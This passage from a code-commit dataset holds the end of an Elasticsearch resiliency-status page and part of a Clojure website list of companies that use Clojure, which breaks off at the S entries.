incremental, making it very efficient since only files changed since the last backup are copied. Even with this efficiency introduced, each snapshot contains a full picture of the cluster at the moment when backup started. The restore API allows speedy recovery of a full cluster as well as selected indices.\n\nSince that first release in version 1.0, the API has continued to evolve. In version 1.1.0, we added a new snapshot status API that allows users to monitor the snapshot process. In 1.3.0 we added the ability to {GIT}6457[restore indices without their aliases] and in 1.4 we are planning to add the ability to {GIT}6368[restore partial snapshots].\n\nThe Snapshot\/Restore API supports a number of different repository types for storing backups. Currently, it\u2019s possible to make backups to a shared file system, Amazon S3, HDFS, and Azure storage. We are continuing to work on adding other types of storage systems, as well as improving the robustness of the snapshot\/restore process.\n\n[float]\n=== Circuit Breaker: Fielddata (STATUS: DONE, v1.0.0)\n\nCurrently, the http:\/\/www.elasticsearch.org\/guide\/en\/elasticsearch\/reference\/current\/index-modules-fielddata.html[circuit breaker] protects against loading too much field data by estimating how much memory the field data will take to load, then aborting the request if the memory requirements are too high. This feature was added in Elasticsearch version 1.0.0.\n\n[float]\n=== Use of Paginated Data Structures to Ease Garbage Collection (STATUS: DONE, v1.0.0 & v1.2.0)\n\nElasticsearch has moved from an object-based cache to a page-based cache recycler as described in issue {GIT}4557[#4557]. This change makes garbage collection easier by limiting fragmentation, since all pages have the same size and are recycled. It also allows managing the size of the cache not based on the number of objects it contains, but on the memory that it uses.\n\nThese pages are used for two main purposes: implementing higher level data structures such as hash tables that are used internally by aggregations to eg. map terms to counts, as well as reusing memory in the translog\/transport layer as detailed in issue {GIT}5691[#5691].\n\n[float]\n=== Dedicated Master Nodes Resiliency (STATUS: DONE, v1.0.0)\n\nIn order to run a more resilient cluster, we recommend running dedicated master nodes to ensure master nodes are not affected by resources consumed by data nodes. We also have made master nodes more resilient to heavy resource usage, mainly associated with large clusters \/ cluster states.\n\nThese changes include:\n\n* Improve the balancing algorithm to execute faster across large clusters \/ many indices. (See issue {GIT}4458[#4458] and {GIT}4459[#4459])\n* Improve cluster state publishing to not create an additional network buffer per node. (More in https:\/\/github.com\/elasticsearch\/elasticsearch\/commit\/a9e259d438c3cb1d3bef757db2d2a91cf85be609[this commit].)\n* Improve master handling of large scale mapping updates from data nodes by batching them into a single cluster event. (See issue {GIT}4373[#4373].)\n* Add an ack mechanism where next phase cluster updates are processed only when nodes acknowledged they received the previous cluster state. (See issues {GIT}3736[#3736], {GIT}3786[#3786], {GIT}4114[#4114], {GIT}4169[#4169], {GIT}4228[#4228] and {GIT}4421[#4421], which also include enhancements to the ack mechanism implementation.)\n\n[float]\n=== Multi Data Paths May Falsely Report Corrupt Index (STATUS: DONE, v1.0.0)\n\nWhen using multiple data paths, an index could be falsely reported as corrupted. This has been fixed with pull request {GIT}4674[#4674].\n\n[float]\n=== Randomized Testing (STATUS: DONE, v1.0.0)\n\nIn order to best validate for resiliency in Elasticsearch, we rewrote the Elasticsearch test infrastructure to introduce the concept of http:\/\/berlinbuzzwords.de\/sites\/berlinbuzzwords.de\/files\/media\/documents\/dawidweiss-randomizedtesting-pub.pdf[randomized testing]. Randomized testing allows us to easily enhance the Elasticsearch testing infrastructure with predictably irrational conditions, making the resulting code base more resilient.\n\nEach of our integration tests runs against a cluster with a random number of nodes, and indices have a random number of shards and replicas. Merge settings change for every run, indexing is done in serial or async fashion or even wrapped in a bulk operation and thread pool sizes vary to ensure that we don\u2019t produce a deadlock no matter what happens. The list of places we use this randomization infrastructure is long, and growing every day, and has saved us headaches several times before we shipped a particular feature.\n\nAt Elasticsearch, we live the philosophy that we can miss a bug once, but never a second time. We make our tests more evil as you go, introducing randomness in all the areas where we discovered bugs. We figure if our tests don\u2019t fail, weare not trying hard enough! If you are interested in how we have evolved our test infrastructure over time check out https:\/\/github.com\/elasticsearch\/elasticsearch\/issues?q=label%3Atest[issues labeled with ``test'' on GitHub].\n\n[float]\n=== Lucene Loses Data On File Descriptors Failure (STATUS: DONE, v0.90.0)\n\nWhen a process runs out of file descriptors, Lucene can causes an index to be completely deleted. This issue was fixed in Lucene ({JIRA}4870[version 4.2.1]) and fixed in an early version of Elasticsearch. See issue {GIT}2812[#2812].\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7369ab00932bb036c43f053367391009429dc650","subject":"add company","message":"add company\n","repos":"clojure\/clojure-site","old_file":"content\/community\/companies.adoc","new_file":"content\/community\/companies.adoc","new_contents":"= Companies\nAlex Miller\n2017-03-15\n:type: community\n:toc: macro\n:icons: font\n\nBelow is a partial list of some companies using Clojure or ClojureScript. Most of this information comes from direct contacts, presentations, or other online resources. If you would like to be added or removed from this list, please contact __clojure@cognitect.com__ or submit a pull request to the https:\/\/github.com\/clojure\/clojure-site[site repository].\n\nAlso, check out the <<success_stories#,Clojure Success Stories>> and <<community_stories#,Community Stories>> pages!\n\n* https:\/\/1st1.dev\/[1st1.dev,opts=nofollow]\n* http:\/\/8thlight.com\/[8th Light,opts=nofollow]\n* http:\/\/www.aclaimant.com\/[aclaimant,opts=nofollow]\n* https:\/\/www.active-group.de\/[Active Group GmbH,opts=nofollow]\n* http:\/\/www.adaptly.com\/[Adaptly,opts=nofollow]\n* http:\/\/www.adgoji.com\/[AdGoji,opts=nofollow]\n* https:\/\/www.adobe.com[Adobe,opts=nofollow]\n* https:\/\/www.adstage.io\/[AdStage,opts=nofollow]\n* http:\/\/www.advanceautoparts.com\/[Advance Auto Parts,opts=nofollow]\n* http:\/\/adzerk.com\/[Adzerk,opts=nofollow]\n* http:\/\/www.againtelligent.com\/en\/[AGA,opts=nofollow]\n* https:\/\/www.onthemarket.com[AgentsMutual\/OnTheMarket,opts=nofollow]\n* http:\/\/www.airloyal.com[Airloyal,opts=nofollow]\n* https:\/\/www.ajira.tech\/[Ajira,opts=nofollow]\n* https:\/\/www.akamai.com\/[Akamai,opts=nofollow]\n* https:\/\/akvo.org[Akvo Foundation,opts=nofollow]\n* http:\/\/www.amazon.com[Amazon,opts=nofollow]\n* https:\/\/amperity.com\/[Amperity,opts=nofollow]\n* https:\/\/www.animalia.no\/[Animalia,opts=nofollow]\n* http:\/\/annadaletech.com\/[Annadale Technologies,opts=nofollow]\n* http:\/\/www.answers.com[Answers.com,opts=nofollow]\n* http:\/\/www.anywhere.com\/[Anywhere.com,opts=nofollow]\n* https:\/\/www.apexdatasolutions.net\/[Apex Data Solutions,opts=nofollow]\n* https:\/\/apple.com[Apple,opts=nofollow]\n* http:\/\/www.appsflyer.com\/[AppsFlyer,opts=nofollow]\n* http:\/\/www.appsmiths.com\/where.php[AppSmiths,opts=nofollow]\n* http:\/\/www.appsnsites.com\/[Appsnsites,opts=nofollow]\n* http:\/\/arcstudiopro.com\/[Arc Studio Pro,opts=nofollow]\n* http:\/\/ardoq.com\/[Ardoq,opts=nofollow]\n* https:\/\/atomist.com[Atomist,opts=nofollow]\n* https:\/\/attendify.com\/[Attendify,opts=nofollow]\n* https:\/\/audiencerepublic.com[Audience Republic,opts=nofollow]\n* http:\/\/auspost.com.au\/[Australia Post,opts=nofollow]\n* http:\/\/www.autheos.com\/[Autheos,opts=nofollow]\n* https:\/\/www.bandsquare.com\/[BandSquare,opts=nofollow]\n* https:\/\/teachbanzai.com\/[Banzai,opts=nofollow]\n* http:\/\/www.baresquare.com\/[baresquare,opts=nofollow]\n* https:\/\/www.barracuda.com\/[Barracuda,opts=nofollow]\n* https:\/\/www.basefex.com\/[BaseFEX,opts=nofollow]\n* http:\/\/beanstalkapp.com\/[Beanstalk,opts=nofollow]\n* http:\/\/BearyInnovative.com[Beary Innovative,opts=nofollow]\n* https:\/\/www.beopinion.com\/[BeOpinion,opts=nofollow]\n* http:\/\/bevuta.com\/[bevuta,opts=nofollow]\n* https:\/\/www.bgpworks.com[BGPworks,opts=nofollow]\n* https:\/\/billfront.com\/[BillFront,opts=nofollow]\n* https:\/\/www.bimsystems.de\/[BIMwelt Systems,opts=nofollow]\n* https:\/\/bloomventures.io[Bloom,opts=nofollow]\n* https:\/\/www.bookwell.com.au\/[BookWell,opts=nofollow]\n* https:\/\/boundlessgeo.com\/[Boundless Geo,opts=nofollow]\n* https:\/\/brainsfeed.com[Brainsfeed,opts=nofollow]\n* https:\/\/www.braintreepayments.com\/[Braintree Payments (acquired by PayPal),opts=nofollow]\n* http:\/\/www.breezeehr.com\/[Breeze EHR,opts=nofollow]\n* http:\/\/brickalloy.com\/[BrickAlloy,opts=nofollow]\n* https:\/\/www.brightin.nl\/[Brightin,opts=nofollow]\n* https:\/\/www.broadbandspeedtest.org.uk\/[BroadbandUK,opts=nofollow]\n* http:\/\/broadpeakpartners.com[BroadPeak,opts=nofollow]\n* https:\/\/buddy.works\/[Buddy,opts=nofollow]\n* http:\/\/bugsbio.org\/[BUGS Bioscience,opts=nofollow]\n* http:\/\/buyhappy.co\/[Buy Happy,opts=nofollow]\n* https:\/\/buzzlers.com[buzzlers.com,opts=nofollow]\n* https:\/\/www.cambioscience.com[CambioScience,opts=nofollow]\n* http:\/\/cambium.consulting\/[Cambium Consulting,opts=nofollow]\n* https:\/\/www.capitalone.com\/[Capital One,opts=nofollow]\n* https:\/\/cardforcoin.com\/[cardforcoin,opts=nofollow]\n* https:\/\/carouselapps.com\/[Carousel Apps,opts=nofollow]\n* https:\/\/www.cars.co.za\/[Cars.co.za,opts=nofollow]\n* http:\/\/carwow.co.uk\/[carwow,opts=nofollow]\n* http:\/\/www.ca.com\/[CA Technologies,opts=nofollow]\n* http:\/\/www.cellusys.com[Cellusys,opts=nofollow]\n* https:\/\/mycentriq.com\/[Centriq,opts=nofollow]\n* http:\/\/www.cenx.com\/[CENX,opts=nofollow]\n* http:\/\/www.cerner.com\/[Cerner,opts=nofollow]\n* https:\/\/cervest.earth[Cervest Ltd.,opts=nofollow]\n* http:\/\/www.consumerfinance.gov\/[CFPB (Credit Financial Protection Bureau),opts=nofollow]\n* http:\/\/chariotsolutions.com\/[Chariot Solutions,opts=nofollow]\n* http:\/\/chartbeat.com[Chartbeat,opts=nofollow]\n* http:\/\/www.cicayda.com\/[Cicayda,opts=nofollow]\n* https:\/\/circleci.com\/[CircleCI,opts=nofollow]\n* https:\/\/www.cisco.com[Cisco,opts=nofollow]\n* http:\/\/www.citi.com[Citi,opts=nofollow]\n* http:\/\/clanhr.com\/en[ClanHR,opts=nofollow]\n* https:\/\/clearcoin.co[ClearCoin,opts=nofollow]\n* http:\/\/www.climate.com\/[Climate Corp (acquired by Monsanto),opts=nofollow]\n* http:\/\/www.clockworks.io\/[Clockworks,opts=nofollow]\n* http:\/\/cloudgears.com\/[CloudGears,opts=nofollow]\n* http:\/\/www.cloudrepo.io\/[CloudRepo,opts=nofollow]\n* https:\/\/clubhouse.io\/[Clubhouse,opts=nofollow]\n* http:\/\/code54.com[Code54,opts=nofollow]\n* http:\/\/codecentric.de[codecentric,opts=nofollow]\n* http:\/\/devartcodefactory.com\/[Co(de)factory,opts=nofollow]\n* http:\/\/www.codurance.com\/[Codurance,opts=nofollow]\n* https:\/\/www.cognician.com\/[Cognician,opts=nofollow]\n* http:\/\/cognitect.com[Cognitect,opts=nofollow]\n* https:\/\/collbox.co\/[CollBox,opts=nofollow]\n* http:\/\/collectivedigitalstudio.com[Collective Digital Studio,opts=nofollow]\n* http:\/\/commonwealthrobotics.com\/[Commonwealth Robotics,opts=nofollow]\n* https:\/\/commsor.com\/[Commsor,opts=nofollow]\n* http:\/\/www.condense.com.au[Condense,opts=nofollow]\n* http:\/\/www.consumerreports.org\/cro\/index.htm[Consumer Reports,opts=nofollow]\n* http:\/\/www.create.at\/[CREATE.21st century,opts=nofollow]\n* https:\/\/www.getcrossbeam.com\/[Crossbeam,opts=nofollow]\n* https:\/\/www.crossref.org\/[Crossref,opts=nofollow]\n* https:\/\/crowd.br.com\/[CROWD,opts=nofollow]\n* https:\/\/cryptowerk.com[Cryptowerk,opts=nofollow]\n* https:\/\/curbside.com[Curbside,opts=nofollow]\n* http:\/\/www.cycloid.io[Cycloid,opts=nofollow]\n* https:\/\/www.cycognito.com[CyCognito,opts=nofollow]\n* http:\/\/www.dailymail.co.uk\/[Daily Mail MailOnline,opts=nofollow]\n* https:\/\/www.databaselabs.io\/[Database Labs,opts=nofollow]\n* http:\/\/www.datacraft.sg\/[Datacraft,opts=nofollow]\n* http:\/\/www.datasnap.io\/[DataSnap.io,opts=nofollow]\n* http:\/\/www.datomic.com\/[Datomic,opts=nofollow]\n* https:\/\/www.d-n.be\/[Debreuck Neirynck (DN),opts=nofollow]\n* https:\/\/www.deep-impact.ch[Deep Impact,opts=nofollow]\n* http:\/\/degree9.io\/[Degree9,opts=nofollow]\n* http:\/\/democracy.works\/[Democracy Works,opts=nofollow]\n* https:\/\/www.deps.co[Deps,opts=nofollow]\n* http:\/\/www.designed.ly\/[Designedly,opts=nofollow]\n* https:\/\/www.db.com[Deutsche Bank,opts=nofollow]\n* https:\/\/www.devatics.com\/[Devatics,opts=nofollow]\n* http:\/\/dewise.com[Dewise,opts=nofollow]\n* https:\/\/www.diagnosia.com\/[Diagnosia,opts=nofollow]\n* https:\/\/www.discendum.com[Discendum ltd,opts=nofollow]\n* https:\/\/www.dividendfinance.com[Dividend Finance,opts=nofollow]\n* https:\/\/www.docsolver.com[DocSolver,opts=nofollow]\n* https:\/\/drevidence.com\/[Doctor Evidence,opts=nofollow]\n* https:\/\/www.doctronic.de[Doctronic,opts=nofollow]\n* http:\/\/dov-e.com[DOV-E,opts=nofollow]\n* http:\/\/dploy.io\/[dploy.io,opts=nofollow]\n* https:\/\/dreamtolearn.com[Dream to Learn,opts=nofollow]\n* http:\/\/drwtrading.com[DRW Trading Group,opts=nofollow]\n* https:\/\/www.dyne.org[Dyne.org,opts=nofollow]\n* http:\/\/www.ebay.com\/[eBay,opts=nofollow]\n* http:\/\/element84.com[Element 84,opts=nofollow]\n* http:\/\/www.empear.com\/[Empear,opts=nofollow]\n* https:\/\/writeandimprove.com\/[English Language iTutoring,opts=nofollow]\n* http:\/\/enterlab.dk[Enterlab,opts=nofollow]\n* https:\/\/www.joinef.com[Entrepreneur First,opts=nofollow]\n* http:\/\/eventfabric.com\/[Event Fabric,opts=nofollow]\n* https:\/\/eventum.no[Eventum,opts=nofollow]\n* https:\/\/evolta.fi\/[Evolta,opts=nofollow]\n* https:\/\/exoscale.ch\/[Exoscale,opts=nofollow]\n* https:\/\/www.eyeota.com\/[Eyeota,opts=nofollow]\n* http:\/\/facebook.com[Facebook,opts=nofollow]\n* http:\/\/www.facjure.com\/[Facjure,opts=nofollow]\n* http:\/\/www.factual.com\/[Factual,opts=nofollow]\n* http:\/\/www.farbetter.com\/[FarBetter,opts=nofollow]\n* https:\/\/fierce.ventures[Fierce.,opts=nofollow]\n* http:\/\/www.finalist.nl\/[Finalist,opts=nofollow]\n* https:\/\/paper.li\/[Finity AI,opts=nofollow]\n* http:\/\/www.flexiana.com\/[Flexiana,opts=nofollow]\n* http:\/\/flocktory.com[Flocktory,opts=nofollow]\n* http:\/\/www.flowa.fi\/[Flowa,opts=nofollow]\n* http:\/\/www.formcept.com\/[FORMCEPT,opts=nofollow]\n* http:\/\/try.framed.io\/[Framed Data,opts=nofollow]\n* https:\/\/freshcodeit.com\/[Freshcode,opts=nofollow]\n* https:\/\/www.fullcontact.com\/[FullContact,opts=nofollow]\n* http:\/\/functionalworks.com\/[Functional Works,opts=nofollow]\n* http:\/\/fundingcircle.com[Funding Circle,opts=nofollow]\n* http:\/\/futurice.com\/[Futurice,opts=nofollow]\n* http:\/\/www.getcontented.com.au\/[GetContented,opts=nofollow]\n* http:\/\/about.getset.com\/[GetSet,opts=nofollow]\n* http:\/\/www.gocatch.com\/[GoCatch,opts=nofollow]\n* https:\/\/gofore.com\/en\/home\/[Gofore,opts=nofollow]\n* https:\/\/www.goizper.com\/[Goizper Group,opts=nofollow]\n* https:\/\/www.go-jek.com[GO-JEK,opts=nofollow]\n* https:\/\/goldfynch.com\/[GoldFynch,opts=nofollow]\n* https:\/\/goodhertz.co\/[Goodhertz,opts=nofollow]\n* http:\/\/www.goopti.com\/[GoOpti,opts=nofollow]\n* http:\/\/www.gracenote.com\/[Gracenote,opts=nofollow]\n* https:\/\/www.grammarly.com\/[Grammarly,opts=nofollow]\n* http:\/\/www.greenpowermonitor.com\/[GreenPowerMonitor,opts=nofollow]\n* http:\/\/www.groupon.com[Groupon,opts=nofollow]\n* https:\/\/guaranteedrate.com[Guaranteed Rate,opts=nofollow]\n* https:\/\/handcheque.com\/[handcheque,opts=nofollow]\n* https:\/\/www.happymoney.com[HappyMoney,opts=nofollow]\n* https:\/\/hashrocket.com\/[Hashrocket,opts=nofollow]\n* http:\/\/www.healthfinch.com\/[healthfinch,opts=nofollow]\n* https:\/\/www.health-samurai.io[HealthSamurai,opts=nofollow]\n* https:\/\/www.helpshift.com\/[Helpshift,opts=nofollow]\n* http:\/\/www.hendrickauto.com\/[Hendrick Automotive Group,opts=nofollow]\n* https:\/\/www.heromarketing.nl\/[Hero Marketing,opts=nofollow]\n* http:\/\/www.heroku.com[Heroku,opts=nofollow]\n* https:\/\/hexawise.com\/[Hexawise,opts=nofollow]\n* https:\/\/homescreen.is\/[#Homescreen,opts=nofollow]\n* https:\/\/www.huobi.com\/[Huobi Global,opts=nofollow]\n* http:\/\/www.ib5k.com\/[IB5k,opts=nofollow]\n* https:\/\/icm-consulting.com.au\/[ICM Consulting,opts=nofollow]\n* http:\/\/labs.ig.com\/[IG,opts=nofollow]\n* https:\/\/www.imatic.cz[Imatic,opts=nofollow]\n* https:\/\/immute.co\/[Immute,opts=nofollow]\n* https:\/\/indabamusic.com[Indaba Music,opts=nofollow]\n* http:\/\/innoq.com[InnoQ,opts=nofollow]\n* https:\/\/instadeq.com\/[instadeq,opts=nofollow]\n* http:\/\/www.intentmedia.com\/[Intent Media,opts=nofollow]\n* http:\/\/www.interware.com.mx\/[InterWare,opts=nofollow]\n* http:\/\/www.intropica.com\/[Intropica,opts=nofollow]\n* http:\/\/www.intuit.com[Intuit,opts=nofollow]\n* http:\/\/www.iplantcollaborative.org\/[iPlant Collaborative,opts=nofollow]\n* https:\/\/www.iprally.com[IPRally Technologies,opts=nofollow]\n* http:\/\/iris.tv\/[IRIS.TV,opts=nofollow]\n* https:\/\/www.jcrew.com\/[J.Crew,opts=nofollow]\n* https:\/\/jesi.io[JESI,opts=nofollow]\n* http:\/\/juxt.pro[JUXT,opts=nofollow]\n* http:\/\/www.kane-group.com\/[Kane LPI,opts=nofollow]\n* https:\/\/kasta.ua[Kasta,opts=nofollow]\n* https:\/\/kirasystems.com\/[Kira,opts=nofollow]\n* https:\/\/klarna.com[Klarna,opts=nofollow]\n* http:\/\/knowledgee.com\/[Knowledge E,opts=nofollow]\n* http:\/\/www.kodemaker.no\/[Kodemaker,opts=nofollow]\n* https:\/\/kwelia.com\/[Kwelia,opts=nofollow]\n* https:\/\/www.ladderlife.com[Ladder,opts=nofollow]\n* https:\/\/www.theladders.com\/[Ladders,opts=nofollow]\n* https:\/\/lambdawerk.com\/[LambdaWerk,opts=nofollow]\n* https:\/\/www.latacora.com\/[Latacora,opts=nofollow]\n* http:\/\/leancloud.cn[Leancloud.cn,opts=nofollow]\n* http:\/\/en.leanheat.com[Leanheat,opts=nofollow]\n* https:\/\/lemmings.io[Lemmings,opts=nofollow]\n* https:\/\/www.lemonpi.io\/[LemonPI,opts=nofollow]\n* https:\/\/www.lendup.com\/[LendUp,opts=nofollow]\n* http:\/\/levelmoney.com[Level Money,opts=nofollow]\n* http:\/\/www.lifebooker.com[Lifebooker,opts=nofollow]\n* http:\/\/liftoff.io\/[Liftoff,opts=nofollow]\n* http:\/\/lightmesh.com[LightMesh,opts=nofollow]\n* http:\/\/likely.co\/[Likely,opts=nofollow]\n* https:\/\/line.me\/[LINE,opts=nofollow]\n* https:\/\/fluent.express[LinguaTrip,opts=nofollow]\n* http:\/\/linkfluence.com[Linkfluence,opts=nofollow]\n* http:\/\/www.listora.com\/[Listora,opts=nofollow]\n* http:\/\/www.liveops.com\/[LiveOps,opts=nofollow]\n* https:\/\/www.livingsocial.com\/[LivingSocial,opts=nofollow]\n* https:\/\/www.localize.city\/[Localize.city,opts=nofollow]\n* https:\/\/locarise.com\/[Locarise,opts=nofollow]\n* http:\/\/logicsoft.co.in\/[Logic Soft Pvt. Ltd.,opts=nofollow]\n* http:\/\/lonocloud.com\/[LonoCloud (acquired by ViaSat),opts=nofollow]\n* https:\/\/www.lookingglasscyber.com\/[LookingGlass Cyber Solutions,opts=nofollow]\n* https:\/\/www.loway.ch\/[Loway,opts=nofollow]\n* https:\/\/lucidit.consulting[Lucid IT Consulting LLC,opts=nofollow]\n* http:\/\/www.lumanu.com\/[Lumanu,opts=nofollow]\n* https:\/\/www.lunchboxsessions.com[LunchBox Sessions,opts=nofollow]\n* https:\/\/www.macrofex.com\/[Macrofex,opts=nofollow]\n* http:\/\/www.macrofex.com[MACROFEX LLC,opts=nofollow]\n* http:\/\/www.madriska.com\/[Madriska Inc.,opts=nofollow]\n* http:\/\/www.magnet.coop\/[Magnet,opts=nofollow]\n* http:\/\/mainstreetgenome.com\/[Main Street Genome,opts=nofollow]\n* https:\/\/www.makimo.pl\/[Makimo, opts=nofollow]\n* http:\/\/www.comidadagente.org\/[Marktbauer\/Comida da gente,opts=nofollow]\n* http:\/\/www.mastodonc.com\/[Mastodon C,opts=nofollow]\n* http:\/\/mayvenn.com[Mayvenn,opts=nofollow]\n* https:\/\/mazira.com\/[Mazira,opts=nofollow]\n* http:\/\/www.mediquest.nl\/[Mediquest,opts=nofollow]\n* http:\/\/meewee.com[MeeWee,opts=nofollow]\n* https:\/\/www.merantix.com\/[Merantix,opts=nofollow]\n* http:\/\/www.metabase.com\/[Metabase,opts=nofollow]\n* http:\/\/www.metail.com[Metail,opts=nofollow]\n* http:\/\/metosin.fi\/[Metosin,opts=nofollow]\n* http:\/\/minorodata.com\/[Minoro,opts=nofollow]\n* https:\/\/mixpanel.com\/[Mixpanel,opts=nofollow]\n* http:\/\/www.mixrad.io\/[MixRadio,opts=nofollow]\n* http:\/\/www.modelogiq.com\/[modelogiq,opts=nofollow]\n* http:\/\/www.molequedeideias.net\/[Moleque de Ideias,opts=nofollow]\n* https:\/\/www.motiva.ai\/[Motiva AI,opts=nofollow]\n* http:\/\/multis.co\/[Multis,opts=nofollow]\n* http:\/\/www.mysema.com\/[Mysema,opts=nofollow]\n* http:\/\/nemCV.com[nemCV.com,opts=nofollow]\n* https:\/\/www.netflix.com[Netflix,opts=nofollow]\n* https:\/\/www.neustar.biz\/[Neustar,opts=nofollow]\n* http:\/\/nexonit.com[nexonit.com,opts=nofollow]\n* http:\/\/www.nextangles.com[NextAngles,opts=nofollow]\n* https:\/\/nextjournal.com\/[Nextjournal,opts=nofollow]\n* http:\/\/nilenso.com\/[nilenso,opts=nofollow]\n* https:\/\/www.nitor.com[Nitor,opts=nofollow]\n* https:\/\/nederlandsegokkasten.com\/[NLG,opts=nofollow]\n* https:\/\/nomnominsights.com[NomNom Insights,opts=nofollow]\n* https:\/\/www.norled.no\/[Norled,opts=nofollow]\n* http:\/\/lamuz.uz[NowMedia Tech,opts=nofollow]\n* https:\/\/nsd.no[NSD - Norwegian Centre for Research Data,opts=nofollow]\n* https:\/\/www.nubank.com.br\/[Nubank,opts=nofollow]\n* https:\/\/nukomeet.com\/[Nukomeet,opts=nofollow]\n* http:\/\/numerical.co.nz\/[Numerical Brass Computing,opts=nofollow]\n* https:\/\/www.ochedart.com\/[Oche Dart,opts=nofollow]\n* https:\/\/oiiku.com[Oiiku,opts=nofollow]\n* https:\/\/okletsplay.com\/[OkLetsPlay,opts=nofollow]\n* http:\/\/www.omnyway.com\/[Omnyway Inc,opts=nofollow]\n* https:\/\/ona.io[Ona,opts=nofollow]\n* https:\/\/onfido.com\/gb\/[Onfido,opts=nofollow]\n* https:\/\/onlinecasinoinformatie.com\/[OnlineCasinoInformatie,opts=nofollow]\n* http:\/\/www.onthemarket.com\/[OnTheMarket,opts=nofollow]\n* https:\/\/opencompany.com\/[OpenCompany,opts=nofollow]\n* http:\/\/OpenSensors.io[OpenSensors.io,opts=nofollow]\n* http:\/\/www.opentable.com\/[OpenTable,opts=nofollow]\n* http:\/\/www.oracle.com[Oracle,opts=nofollow]\n* http:\/\/www.orgsync.com\/[OrgSync,opts=nofollow]\n* https:\/\/www.orkli.com\/en[Orkli,opts=nofollow]\n* https:\/\/www.oscaro.com\/[Oscaro,opts=nofollow]\n* http:\/\/otto.de[Otto,opts=nofollow]\n* http:\/\/ourhub.dk[OurHub,opts=nofollow]\n* http:\/\/www.outpace.com\/[Outpace,opts=nofollow]\n* http:\/\/corp.outpostgames.com\/[Outpost Games,opts=nofollow]\n* http:\/\/owsy.com[Owsy,opts=nofollow]\n* https:\/\/oysterlab.ch[Oyster Lab by Alpiq,opts=nofollow]\n* http:\/\/paddleguru.com[PaddleGuru,opts=nofollow]\n* http:\/\/www.bdpanacea.com\/[Panacea Systems,opts=nofollow]\n* https:\/\/www.pandora.com\/[Pandora,opts=nofollow]\n* http:\/\/paper.li[paper.li,opts=nofollow]\n* https:\/\/www.parcelbright.com\/[ParcelBright,opts=nofollow]\n* https:\/\/partsbox.io\/[PartsBox,opts=nofollow]\n* http:\/\/www.passivsystems.com\/[PassivSystems,opts=nofollow]\n* http:\/\/path.com\/[Path,opts=nofollow]\n* http:\/\/paygarden.com[PayGarden,opts=nofollow]\n* https:\/\/paygo.com.br[PayGo,opts=nofollow]\n* https:\/\/www.payoff.com\/[Payoff,opts=nofollow]\n* http:\/\/www.pennymacusa.com[PennyMac,opts=nofollow]\n* https:\/\/pilloxa.com[Pilloxa,opts=nofollow]\n* https:\/\/pisano.co\/[Pisano,opts=nofollow]\n* https:\/\/pitch.com\/[Pitch,opts=nofollow]\n* http:\/\/www.pivotal.io\/[Pivotal Labs,opts=nofollow]\n* https:\/\/www.pkc.io\/[PKC,opts=nofollow]\n* http:\/\/www.pointslope.com[Point Slope,opts=nofollow]\n* https:\/\/pol.is\/about\/[Pol.is,opts=nofollow]\n* http:\/\/dmarc.postmarkapp.com\/[Postmark,opts=nofollow]\n* https:\/\/precursorapp.com\/[Precursor,opts=nofollow]\n* http:\/\/www.premium.nl\/[Premium Business Consultants BV,opts=nofollow]\n* http:\/\/prime.vc\/[Prime.vc,opts=nofollow]\n* http:\/\/www.print.io\/[Print.IO,opts=nofollow]\n* https:\/\/projectmaterials.com[projectmaterials.com,opts=nofollow]\n* http:\/\/projexsys.com\/[Projexsys,opts=nofollow]\n* https:\/\/www.protopie.io\/[ProtoPie,opts=nofollow]\n* https:\/\/publizr.com\/[Publizr,opts=nofollow]\n* http:\/\/puppetlabs.com\/[Puppet Labs,opts=nofollow]\n* https:\/\/www.purposefly.com\/[PurposeFly,opts=nofollow]\n* https:\/\/quartethealth.com\/[Quartet Health,opts=nofollow]\n* http:\/\/www.quintype.com\/[Quintype,opts=nofollow]\n* https:\/\/qvantel.com\/[Qvantel,opts=nofollow]\n* http:\/\/www.radiantlabs.co[Radiant Labs,opts=nofollow]\n* https:\/\/radioactive.sg[RADIOactive,opts=nofollow]\n* http:\/\/reaktor.com\/[Reaktor,opts=nofollow]\n* https:\/\/www.redhat.com\/[Red Hat,opts=nofollow]\n* https:\/\/www.redpineapplemedia.com\/[Red Pineapple Media,opts=nofollow]\n* https:\/\/www.reifyhealth.com\/[Reify Health,opts=nofollow]\n* http:\/\/rentpath.com\/[RentPath,opts=nofollow]\n* http:\/\/jbrj.gov.br\/[Rio de Janeiro Botanical Garden,opts=nofollow]\n* http:\/\/rjmetrics.com\/[RJMetrics,opts=nofollow]\n* http:\/\/www.romr.com\/[R\u014dmr,opts=nofollow]\n* http:\/\/rocketfuel.com\/[Rocket Fuel,opts=nofollow]\n* https:\/\/rokt.com\/[ROKT,opts=nofollow]\n* http:\/\/www.roomkey.com\/[Room Key,opts=nofollow]\n* http:\/\/roomstorm.com\/[Roomstorm,opts=nofollow]\n* https:\/\/www.rowdylabs.com[Rowdy Labs,opts=nofollow]\n* http:\/\/roximity.com\/[ROXIMITY,opts=nofollow]\n* https:\/\/www.rts.ch\/info[RTS,opts=nofollow]\n* http:\/\/www.salesforce.com\/[Salesforce,opts=nofollow]\n* https:\/\/www.salliemae.com\/[Sallie Mae,opts=nofollow]\n* https:\/\/www.sap.com[SAP,opts=nofollow]\n* https:\/\/www.concur.com\/[SAP Concur,opts=nofollow]\n* http:\/\/www.twitter-fu.com\/[Sapiens Sapiens,opts=nofollow]\n* https:\/\/www.schibsted.com\/[Schibsted,opts=nofollow]\n* http:\/\/www.shareablee.com\/[Shareablee,opts=nofollow]\n* https:\/\/sharetribe.com\/[Sharetribe,opts=nofollow]\n* http:\/\/shore.li\/[shore.li,opts=nofollow]\n* http:\/\/www.signafire.com[Signafire,opts=nofollow]\n* http:\/\/signal.uk.com\/[Signal,opts=nofollow]\n* https:\/\/www.siili.com\/[Siili Solutions,opts=nofollow]\n* http:\/\/docs.svbplatform.com\/[Silicon Valley Bank,opts=nofollow]\n* http:\/\/silverline.mobi\/[Silverline Mobile,opts=nofollow]\n* http:\/\/www.silverpond.com.au\/[Silverpond,opts=nofollow]\n* https:\/\/www.simple.com\/[Simple,opts=nofollow]\n* https:\/\/www.simply.co.za[Simply,opts=nofollow]\n* http:\/\/www.sinapsi.com\/[Sinapsi,opts=nofollow]\n* http:\/\/us.sios.com\/[SIOS Technology Corp.,opts=nofollow]\n* https:\/\/sixsq.com\/[SixSq,opts=nofollow]\n* http:\/\/smilebooth.com\/[Smilebooth,opts=nofollow]\n* http:\/\/smxemail.com\/[SMX,opts=nofollow]\n* https:\/\/socialsuperstore.com\/[Social Superstore,opts=nofollow]\n* 